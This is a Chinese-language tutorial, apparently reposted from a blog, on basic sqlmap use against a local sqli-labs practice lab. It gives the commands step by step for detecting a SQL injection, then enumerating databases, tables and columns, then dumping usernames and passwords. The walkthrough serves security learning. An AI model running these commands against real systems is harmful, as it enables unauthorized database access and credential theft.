SQLMAP简单使用

SQLMAP简单使用

      SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft  SQL  Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

工具/原料

  • sqli-labs https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html

  • sqlmap

方法/步骤

  1. 1

    以sqli-labs第一关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第一关系统正常运行如下。

    SQLMAP简单使用

  2. 2

    打开sqlmap输入Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。

    SQLMAP简单使用

    SQLMAP简单使用

  3. 3

    扫描二维码关注公众号,回复: 12233201 查看本文章

    使用sqlmap注入获取数据库,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1"  --dbs 列取数据库的所有库。如图查询到所有库的名称。

    SQLMAP简单使用

    SQLMAP简单使用

  4. 4

    列出当前数据库使用参数--current-db输入命令。Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-db,如下图查询出当前库为security。

    SQLMAP简单使用

    SQLMAP简单使用

  5. 5

    查询security库中存在的所有表,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security --tables如下图查询出四个表。

    SQLMAP简单使用

    SQLMAP简单使用

  6. 6

    列出security库中users表中的所有列,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、--columns:列出指定表上的所有列)。

    SQLMAP简单使用

    SQLMAP简单使用

  7. 7

    导出三个数据列中所有的数据:Python2 sqlmap.py -u "http://10.10.10.1/

    sqli-labs-master/Less-1/?id=1" -D security -T users -C id,username,password --dump (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、--dump:导出列里面的字段)。

    SQLMAP简单使用

    SQLMAP简单使用

猜你喜欢

转载自blog.csdn.net/liuno0/article/details/100174414